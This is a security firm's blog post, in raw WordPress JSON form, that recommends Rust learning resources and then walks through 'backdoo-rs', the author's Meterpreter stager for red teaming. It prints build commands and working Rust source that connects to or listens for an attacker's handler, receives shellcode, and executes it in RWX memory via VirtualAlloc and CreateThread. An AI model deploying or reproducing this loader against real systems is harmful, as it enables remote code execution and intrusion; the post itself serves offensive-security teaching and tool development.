{"id":3336,"date":"2024-09-03T08:07:32","date_gmt":"2024-09-03T06:07:32","guid":{"rendered":"https:\/\/security.humanativaspa.it\/?p=3336"},"modified":"2025-10-21T09:09:49","modified_gmt":"2025-10-21T09:09:49","slug":"learning-rust-for-fun-and-backdoo-rs","status":"publish","type":"post","link":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/","title":{"rendered":"Learning Rust for fun and backdoo-rs"},"content":{"rendered":"<blockquote><p><em>&#8220;Launch the Polaris<\/em><br \/>\n<em>The end doesn&#8217;t scare us<\/em><br \/>\n<em>When will this cease?<br \/>\nThe warheads will all Rust in peace&#8221;<br \/>\n&#8212; Megadeth, Rust in Peace&#8230; Polaris (1990)<\/em><\/p><\/blockquote>\n<h3>Learning Rust in 2024<\/h3>\n<p>This summer I decided it was high time to learn some <a href=\"https:\/\/www.rust-lang.org\/\">Rust<\/a>. For those who lived under a rock for the past 9 years or so, <strong>Rust is a modern systems programming language<\/strong> with an ambitious goal: to provide the same <strong>performance and efficiency<\/strong> of languages such as C and C++, while avoiding their pitfalls &#8212; namely, the dreaded <a href=\"http:\/\/catb.org\/jargon\/html\/N\/nasal-demons.html\">nasal demons<\/a> of undefined behavior.<\/p>\n<p>Rust&#8217;s popularity is <a href=\"https:\/\/www.tiobe.com\/tiobe-index\/rust\/\">steadily increasing<\/a>, with Internet giants such as <a href=\"https:\/\/security.googleblog.com\/2022\/12\/memory-safe-languages-in-android-13.html\">Google<\/a> and <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/dev-environment\/rust\/overview\">Microsoft<\/a> investing in it:<\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\">\n<p lang=\"en\" dir=\"ltr\">Had a great time doing a keynote at <a href=\"https:\/\/twitter.com\/ProssimoISRG?ref_src=twsrc%5Etfw\">@ProssimoISRG<\/a> on Microsoft approach to memory safety.  <\/p>\n<p>Made a huge announcement &#8211; <a href=\"https:\/\/twitter.com\/Microsoft?ref_src=twsrc%5Etfw\">@microsoft<\/a> is going big on Rust and spending $10 million to make it 1st class language in our engineering systems + $1 million <a href=\"https:\/\/twitter.com\/rustlang?ref_src=twsrc%5Etfw\">@rustlang<\/a> foundation.\u2026 <a href=\"https:\/\/t.co\/E1TdQhHzvB\">https:\/\/t.co\/E1TdQhHzvB<\/a> <a href=\"https:\/\/t.co\/w0EkzAjZaG\">pic.twitter.com\/w0EkzAjZaG<\/a><\/p>\n<p>&mdash; David Weston (DWIZZZLE) (@dwizzzleMSFT) <a href=\"https:\/\/twitter.com\/dwizzzleMSFT\/status\/1720134540822520268?ref_src=twsrc%5Etfw\">November 2, 2023<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<p>After rounding up some learning materials, I embarked on a journey of <strong>theoretical and practical study<\/strong>. If you&#8217;d like to follow on a similar path, keep reading. It&#8217;s 2024, there are plenty of <a href=\"https:\/\/www.rust-lang.org\/learn\">Rust learning resources<\/a> available and it&#8217;s easy to get lost among them&#8230; Below, I provide the recommendations I wish I had when I started learning Rust.<\/p>\n<h3>Learning materials<\/h3>\n<p>First of all, you&#8217;ll need a soundtrack! In case you miss the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Thrash_metal\">thrash metal<\/a> scene of the late 80s and early 90s like I do, you can&#8217;t go wrong with <strong>&#8220;Rust in Peace&#8221; by Megadeth<\/strong>. How appropriate! \ud83e\udd18<\/p>\n<p><iframe title=\"[Full Album] M\u0332egade\u0332th - Ru\u0332st In Pe\u0332ace\" width=\"840\" height=\"473\" src=\"https:\/\/www.youtube.com\/embed\/Ti_imhKBjXA?feature=oembed&#038;width=840&#038;height=1000&#038;discover=1\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p>Now that we&#8217;ve found some music that &#8220;makes you hack harder&#8221; (to quote a friend), here&#8217;s a list of <strong>recommended learning resources<\/strong>, in the order in which I perused them:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.jetbrains.com\/rust\/\">RustRover<\/a>. This new, <a href=\"https:\/\/blog.jetbrains.com\/rust\/2024\/05\/21\/rustrover-is-released-and-includes-a-free-non-commercial-option\/\">free for non-commercial use<\/a> IDE is really outstanding and delightful to use, as should be expected from a product by <a href=\"https:\/\/www.jetbrains.com\/\">JetBrains<\/a>. I highly recommend to check it out.<\/li>\n<li><a href=\"https:\/\/code.visualstudio.com\/docs\/languages\/rust\">Rust in Visual Studio Code<\/a>. Most text editors and IDEs provide <a href=\"https:\/\/github.com\/rust-unofficial\/awesome-rust?tab=readme-ov-file#ides\">Rust support<\/a>. If your IDE of choice is <a href=\"https:\/\/code.visualstudio.com\/\">VS Code<\/a>, take a look also at the <a href=\"https:\/\/marketplace.visualstudio.com\/items?itemName=bungcip.better-toml\">Even Better TOML<\/a> and <a href=\"https:\/\/marketplace.visualstudio.com\/items?itemName=jinxdash.prettier-rust\">Prettier Rust<\/a> extensions.<\/li>\n<li><a href=\"https:\/\/www.oreilly.com\/library\/view\/programming-rust-2nd\/9781492052586\/\">Programming Rust 2nd Edition<\/a>. This O&#8217;Reilly book is, in my opinion, even better than the official <a href=\"https:\/\/doc.rust-lang.org\/book\/\">Rust Book<\/a>. It covers all you need to know (and then some) to get familiar with Rust, in a very readable way.<\/li>\n<li><a href=\"https:\/\/rust-book.cs.brown.edu\/\">Rust Book Experiment<\/a>. Of course, &#8220;The Book&#8221; is still &#8220;The Book&#8221;, and you should read it or at least skim through it and solve the interactive quizzes that come with this experimental version.<\/li>\n<li><a href=\"https:\/\/fasterthanli.me\/articles\/a-half-hour-to-learn-rust\">A half-hour to learn Rust<\/a>. In this short article, <a href=\"https:\/\/hachyderm.io\/@fasterthanlime\">fasterthanlime<\/a> goes through as many Rust snippets as he can, explaining what the keywords and symbols they contain mean.<\/li>\n<li><a href=\"https:\/\/google.github.io\/comprehensive-rust\/\">Comprehensive Rust<\/a>. Another free Rust course, developed by the Android team at Google. It covers the full spectrum of Rust and then dives into more specialized topics, such as Android, Chromium, bare-metal, and concurrency.<\/li>\n<li><a href=\"https:\/\/rust-unofficial.github.io\/too-many-lists\/\">Learn Rust With Entirely Too Many Linked Lists<\/a>. A fun and entertaining book on the intricacies of Rust (and linked lists) by the same author of the eldritch <a href=\"https:\/\/doc.rust-lang.org\/nomicon\/\">Rustonomicon<\/a>.<\/li>\n<li><a href=\"https:\/\/github.com\/rust-lang\/rustlings\/\">Rustlings<\/a>. Small exercises to get you used to reading and writing Rust code, useful for some easy practice once you&#8217;ve learned the basics of the language. Alternatively, check out <a href=\"https:\/\/doc.rust-lang.org\/rust-by-example\/\">Rust by Example<\/a>.<\/li>\n<li><a href=\"https:\/\/rust-exercises.com\/\">100 Exercises To Learn Rust<\/a>. After going through everything above with the proper attitude, you&#8217;re probably ready to start developing your own code. If you still feel the need for some more guided practice, this is an excellent resource.<\/li>\n<li><a href=\"https:\/\/cheats.rs\/\">Rust Language Cheat Sheet<\/a>. Finally, this awesome cheatsheet puts everything together in a compact way, much easier to consult than the official <a href=\"https:\/\/doc.rust-lang.org\/reference\/\">Rust Reference<\/a>. Keep it handy while hacking on Rust.<\/li>\n<\/ul>\n<p>I guess that&#8217;s it. You now know Rust, congratulations! \ud83e\udd80<\/p>\n<figure id=\"attachment_3434\" aria-describedby=\"caption-attachment-3434\" style=\"width: 640px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" class=\"wp-image-3434 size-large\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-09-at-11.06.15-1-1024x934.png\" alt=\"\" width=\"640\" height=\"584\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-09-at-11.06.15-1-1024x934.png 1024w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-09-at-11.06.15-1-300x274.png 300w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-09-at-11.06.15-1-768x701.png 768w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-09-at-11.06.15-1-350x319.png 350w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-09-at-11.06.15-1.png 1480w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/><figcaption id=\"caption-attachment-3434\" class=\"wp-caption-text\">Spoiler! The end of Rustlings.<\/figcaption><\/figure>\n<p>Joking apart, what I actually learned is that learning Rust is a long and sometimes painful process. However, in about <strong>50 hours of study<\/strong>, I became proficient enough to create my first project&#8230;<\/p>\n<h3>Meet backdoo-rs<\/h3>\n<p>As an established ritual, my first project in any new language must be a <strong>custom Meterpreter stager<\/strong>! Here are some notable precursors that are part of this noble tradition:<\/p>\n<ul>\n<li><a href=\"https:\/\/web.archive.org\/web\/20200702153318\/https:\/\/techblog.mediaservice.net\/2017\/11\/how-a-unix-hacker-discovered-the-windows-powershell\/\">https:\/\/techblog.mediaservice.net\/2017\/11\/how-a-unix-hacker-discovered-the-windows-powershell\/<\/a><\/li>\n<li><a href=\"https:\/\/hnsecurity.it\/letme-go-a-minimalistic-meterpreter-stager-written-in-go\/\">https:\/\/hnsecurity.it\/letme-go-a-minimalistic-meterpreter-stager-written-in-go\/<\/a><\/li>\n<\/ul>\n<p>Now, lo and behold, <strong>backdoo-rs<\/strong>:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/0xdea\/backdoo-rs\">https:\/\/github.com\/0xdea\/backdoo-rs<\/a><\/li>\n<\/ul>\n<p>Let&#8217;s see it in action. You can <strong>download and cross-compile<\/strong> it as follows (macOS example):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"minimal\" data-enlighter-linenumbers=\"false\">raptor@fnord github % git clone https:\/\/github.com\/0xdea\/backdoo-rs\r\nCloning into 'backdoo-rs'...\r\n[...]\r\nraptor@fnord github % cd backdoo-rs\r\nraptor@fnord backdoo-rs % brew install mingw-w64\r\n[...]\r\nraptor@fnord backdoo-rs % rustup target add x86_64-pc-windows-gnu\r\n[...]\r\nraptor@fnord backdoo-rs % cargo build --release --target x86_64-pc-windows-gnu\r\n   Compiling proc-macro2 v1.0.86\r\n   Compiling windows_x86_64_gnu v0.52.6\r\n   Compiling unicode-ident v1.0.12\r\n   Compiling quote v1.0.36\r\n   Compiling syn v2.0.70\r\n   Compiling windows-targets v0.52.6\r\n   Compiling windows-result v0.2.0\r\n   Compiling windows-strings v0.1.0\r\n   Compiling windows-implement v0.58.0\r\n   Compiling windows-interface v0.58.0\r\n   Compiling windows-core v0.58.0\r\n   Compiling windows v0.58.0\r\n   Compiling backdoo-rs v0.1.0 (\/Users\/raptor\/Downloads\/github\/backdoo-rs)\r\n    Finished `release` profile [optimized] target(s) in 8.72s\r\nraptor@fnord backdoo-rs % ls -l target\/x86_64-pc-windows-gnu\/release\/backdoo-rs.exe\r\n-rwxr-xr-x@ 1 raptor  staff  292352 Jul 12 10:12 target\/x86_64-pc-windows-gnu\/release\/backdoo-rs.exe*\r\nraptor@fnord backdoo-rs %<\/pre>\n<p>Then, on your attack box, start an\u00a0<strong>exploit\/multi\/handler<\/strong>\u00a0instance configured to handle one of the supported Meterpreter payloads (e.g., windows\/x64\/meterpreter\/reverse_tcp):<\/p>\n<p><img decoding=\"async\" class=\"aligncenter size-full wp-image-3548\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.41.19-1.png\" alt=\"\" width=\"1980\" height=\"622\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.41.19-1.png 1980w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.41.19-1-300x94.png 300w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.41.19-1-1024x322.png 1024w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.41.19-1-768x241.png 768w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.41.19-1-1536x483.png 1536w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.41.19-1-350x110.png 350w\" sizes=\"(max-width: 1980px) 100vw, 1980px\" \/><\/p>\n<p>Finally, run\u00a0<strong>backdoo-rs.exe<\/strong>\u00a0on the target Windows box with a command such as the following:<\/p>\n<p><img decoding=\"async\" class=\"aligncenter size-full wp-image-3542\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-103315-1.png\" alt=\"\" width=\"1500\" height=\"688\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-103315-1.png 1500w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-103315-1-300x138.png 300w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-103315-1-1024x470.png 1024w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-103315-1-768x352.png 768w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-103315-1-350x161.png 350w\" sizes=\"(max-width: 1500px) 100vw, 1500px\" \/><\/p>\n<p>Enjoy your Meterpreter <strong>session<\/strong>!<\/p>\n<p><img decoding=\"async\" class=\"aligncenter size-full wp-image-3557\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.47.49-1.png\" alt=\"\" width=\"1980\" height=\"822\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.47.49-1.png 1980w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.47.49-1-300x125.png 300w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.47.49-1-1024x425.png 1024w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.47.49-1-768x319.png 768w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.47.49-1-1536x638.png 1536w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/07\/Screenshot-2024-07-12-at-10.47.49-1-350x145.png 350w\" sizes=\"(max-width: 1980px) 100vw, 1980px\" \/><\/p>\n<h3>A peek under the hood<\/h3>\n<p>Yes, backdoo-rs is <strong>just a toy implant<\/strong>: Meterpreter itself or some of its functionality will definitely be flagged by a half-competent antivirus (or EDR\/XDR as the cool kids call it nowadays \ud83e\udd26). Therefore, its use out of the box for actual red teaming operations is not recommended. However, while I was coding it <strong>I learned a few things along the way<\/strong>, so it&#8217;s all good! For instance:<\/p>\n<ul>\n<li>Package organization (the best for learning this is the <a href=\"https:\/\/www.oreilly.com\/library\/view\/programming-rust\/9781491927274\/\">Programming Rust<\/a> book, but see also <a href=\"https:\/\/rust-book.cs.brown.edu\/ch07-00-managing-growing-projects-with-packages-crates-and-modules.html\">this section<\/a> of The Book)<\/li>\n<li>Command-line processing (see <a href=\"https:\/\/rust-book.cs.brown.edu\/ch12-00-an-io-project.html\">this section<\/a> of The Book and also the <a href=\"https:\/\/rust-cli.github.io\/book\/index.html\">dedicated short book<\/a>)<\/li>\n<li>Network and IO APIs (again, see the <a href=\"https:\/\/www.oreilly.com\/library\/view\/programming-rust\/9781491927274\/\">Programming Rust<\/a> book and also <a href=\"https:\/\/rust-book.cs.brown.edu\/ch20-00-final-project-a-web-server.html\">this section<\/a> of The Book)<\/li>\n<li>Windows foreign function interface (see <a href=\"https:\/\/doc.rust-lang.org\/nomicon\/ffi.html\">this section<\/a> of Rustonomicon and <a href=\"https:\/\/crates.io\/crates\/windows\">this crate<\/a>)<\/li>\n<li>A sprinkle of unsafe Rust (again, see the <a href=\"https:\/\/doc.rust-lang.org\/nomicon\/\">Rustonomicon<\/a>)<\/li>\n<li>Cross-compilation (see <a href=\"https:\/\/rust-lang.github.io\/rustup\/cross-compilation.html\">this section<\/a> of the rustup book)<\/li>\n<li>Cargo features and build scripts (see <a href=\"https:\/\/doc.rust-lang.org\/cargo\/reference\/manifest.html\">these<\/a> <a href=\"https:\/\/doc.rust-lang.org\/cargo\/reference\/build-scripts.html\">sections<\/a> of the cargo reference)<\/li>\n<li>Binary size optimization (see <a href=\"https:\/\/github.com\/johnthagen\/min-sized-rust\">this GitHub repository<\/a>)<\/li>\n<\/ul>\n<p>Phew, quite a lot of stuff \ud83d\ude05<\/p>\n<p>Let&#8217;s take a brief look at the code, shall we? The <strong>main()<\/strong> function is straightforward. Its task is to process the command line arguments and call the run() public function exported by the backdoo.rs module, <a href=\"https:\/\/rust-book.cs.brown.edu\/ch12-03-improving-error-handling-and-modularity.html\">handling any error<\/a> that might occur in such a function:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"rust\" data-enlighter-theme=\"minimal\">fn main() {\r\n    println!(\"backdoo-rs - A simple Meterpreter stager written in Rust\");\r\n    println!(\"Copyright (c) 2024 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;\");\r\n    println!();\r\n\r\n    \/\/ Parse command line arguments\r\n    let args: Vec&lt;String&gt; = env::args().collect();\r\n    let addr = match args.len() {\r\n        1 =&gt; \":4444\".to_string(),\r\n        2 =&gt; args[1].clone(),\r\n        _ =&gt; {\r\n            usage(&amp;args[0]);\r\n            process::exit(1);\r\n        }\r\n    };\r\n\r\n    if addr.starts_with('-') {\r\n        usage(&amp;args[0]);\r\n        process::exit(1);\r\n    }\r\n\r\n    \/\/ Let's do it\r\n    match run(&amp;addr) {\r\n        Ok(()) =&gt; (),\r\n        Err(err) =&gt; {\r\n            eprintln!(\"[!] Error: {err}\");\r\n            process::exit(1);\r\n        }\r\n    }\r\n}<\/pre>\n<p>The <strong>run()<\/strong> function implements the logic of the program. Based on its input, it starts either a bind_tcp or a reverse_tcp stager, then calls two private functions to receive and execute the Meterpreter payload. As for error handling, we make extensive use of the convenient <a href=\"https:\/\/doc.rust-lang.org\/reference\/expressions\/operator-expr.html#the-question-mark-operator\">&#8216;?&#8217; operator<\/a> that propagates errors to the calling function:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"rust\" data-enlighter-theme=\"minimal\">pub fn run(addr: &amp;str) -&gt; Result&lt;(), Box&lt;dyn Error&gt;&gt; {\r\n    let stream = if addr.starts_with(':') {\r\n        \/\/ Start a bind_tcp stager\r\n        let addr = format!(\"0.0.0.0{addr}\");\r\n        println!(\"[*] Using bind_tcp stager ({addr})\");\r\n        let listener = TcpListener::bind(&amp;addr)?;\r\n        let (stream, _) = listener.accept()?;\r\n        stream\r\n    } else {\r\n        \/\/ Start a reverse_tcp stager\r\n        println!(\"[*] Using reverse_tcp stager ({addr})\");\r\n        TcpStream::connect(addr)?\r\n    };\r\n\r\n    \/\/ Receive and execute the payload\r\n    let payload = payload_recv(&amp;stream)?;\r\n    println!(\"[+] Payload received!\");\r\n    payload_exec(&amp;payload);\r\n\r\n    Ok(())\r\n}<\/pre>\n<p>Here&#8217;s where things start getting interesting. The <strong>payload_recv()<\/strong> function instantiates a buffered reader and uses it to receive a Meterpreter payload via the TCP connection that was previously established. Basically, it puts the payload in a properly-sized vector of bytes and does the <a href=\"https:\/\/web.archive.org\/web\/20160729173608\/https:\/\/dev.metasploit.com\/pipermail\/framework\/2012-September\/008664.html\">necessary magic<\/a> to make the shellcode work \ud83e\ude84. Notice the Windows-specific <a href=\"https:\/\/doc.rust-lang.org\/std\/os\/windows\/io\/trait.AsRawSocket.html\">as_raw_socket()<\/a> method call to extract the underlying socket handle, which took me a while to figure out:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"rust\" data-enlighter-theme=\"minimal\">fn payload_recv(stream: &amp;TcpStream) -&gt; Result&lt;Vec&lt;u8&gt;, Box&lt;dyn Error&gt;&gt; {\r\n    let mut reader = BufReader::new(stream);\r\n\r\n    \/\/ Read the 4-byte payload length and allocate the payload buffer\r\n    let mut tmp = [0u8; 4];\r\n    reader.read_exact(&amp;mut tmp)?;\r\n    let length = u32::from_le_bytes(tmp);\r\n    let mut payload = vec![0u8; length as usize + 5];\r\n\r\n    \/\/ Prepend some ASM to MOV the socket handle into EDI\r\n    \/\/ MOV EDI, 0x12345678 ; BF 78 56 34 12\r\n    let fd = stream.as_raw_socket() as u32;\r\n    payload[0] = 0xbf;\r\n    payload[1..5].copy_from_slice(&amp;fd.to_le_bytes());\r\n\r\n    \/\/ Finish reading the payload\r\n    reader.read_exact(&amp;mut payload[5..])?;\r\n    Ok(payload)\r\n}<\/pre>\n<p>Finally, the <strong>payload_exec()<\/strong> function uses the FFI as implemented by the <a href=\"https:\/\/crates.io\/crates\/windows\">windows crate<\/a> to get a raw pointer to some RWX memory via the VirtualAlloc() Windows API function, copies the received payload there, and executes it by calling CreateThread(), waiting for the shellcode to finish running via WaitForSingleObject() before allowing the stager to exit:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"rust\" data-enlighter-theme=\"minimal\">fn payload_exec(payload: &amp;[u8]) {\r\n    const MEM_COMMIT: u32 = 0x1000;\r\n    const MEM_RESERVE: u32 = 0x2000;\r\n    const INFINITE: u32 = 0xFFFFFFFF;\r\n\r\n    \/\/ Get a pointer to RWX memory\r\n    let ptr = unsafe {\r\n        VirtualAlloc(\r\n            None,\r\n            payload.len(),\r\n            VIRTUAL_ALLOCATION_TYPE(MEM_COMMIT | MEM_RESERVE),\r\n            PAGE_EXECUTE_READWRITE,\r\n        )\r\n    };\r\n    if ptr.is_null() {\r\n        eprintln!(\"[!] Error: Failed to allocate memory for payload\");\r\n        return;\r\n    }\r\n\r\n    \/\/ Copy and execute the payload\r\n    unsafe {\r\n        ptr::copy_nonoverlapping(payload.as_ptr(), ptr as *mut u8, payload.len());\r\n        #[allow(clippy::missing_transmute_annotations)]\r\n        let _ = CreateThread(\r\n            None,\r\n            0,\r\n            Some(mem::transmute(ptr)),\r\n            None,\r\n            THREAD_CREATION_FLAGS(0),\r\n            None,\r\n        );\r\n        \/\/ Wait for the thread to finish running\r\n        let _ = WaitForSingleObject(GetCurrentThread(), INFINITE);\r\n    }\r\n}<\/pre>\n<p>Well, that&#8217;s pretty much the gist of it. Thank you for following along, I hope you enjoyed the ride! It&#8217;s now time to put my newly-acquired rustacean skills to good use and develop something that&#8217;s actually useful for our red teaming engagements.<\/p>\n<p>Until <a href=\"https:\/\/hnsecurity.it\/tag\/rust\/\">next time<\/a>&#8230;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;Launch the Polaris The end doesn&#8217;t scare us When will this cease? The warheads will all Rust in peace&#8221; &#8212; [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":159953,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[88,91],"tags":[132,133,134,135,191,206],"class_list":["post-3336","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tools","category-articles","tag-metasploit","tag-meterpreter","tag-tactical-exploitation","tag-windows","tag-red-teaming","tag-rust"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>HN Security - Learning Rust for fun and backdoo-rs -<\/title>\n<meta name=\"description\" content=\"First installment of the Offensive Rust series that introduces learning resources and walks through the implementation of a red teaming tool.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HN Security - Learning Rust for fun and backdoo-rs -\" \/>\n<meta property=\"og:description\" content=\"First installment of the Offensive Rust series that introduces learning resources and walks through the implementation of a red teaming tool.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/\" \/>\n<meta property=\"og:site_name\" content=\"HN Security\" \/>\n<meta property=\"article:published_time\" content=\"2024-09-03T06:07:32+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T09:09:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"836\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Marco Ivaldi\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hnsec\" \/>\n<meta name=\"twitter:site\" content=\"@hnsec\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Marco Ivaldi\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/\"},\"author\":{\"name\":\"Marco Ivaldi\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/89a4174c275f05d6148fb0fdedc8de4f\"},\"headline\":\"Learning Rust for fun and backdoo-rs\",\"datePublished\":\"2024-09-03T06:07:32+00:00\",\"dateModified\":\"2025-10-21T09:09:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/\"},\"wordCount\":1216,\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"keywords\":[\"metasploit\",\"meterpreter\",\"tactical exploitation\",\"windows\",\"red teaming\",\"rust\"],\"articleSection\":[\"Tools\",\"Articles\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/\",\"name\":\"HN Security - Learning Rust for fun and backdoo-rs -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"datePublished\":\"2024-09-03T06:07:32+00:00\",\"dateModified\":\"2025-10-21T09:09:49+00:00\",\"description\":\"First installment of the Offensive Rust series that introduces learning resources and walks through the implementation of a red teaming tool.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/#primaryimage\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"width\":1600,\"height\":836,\"caption\":\"Rust 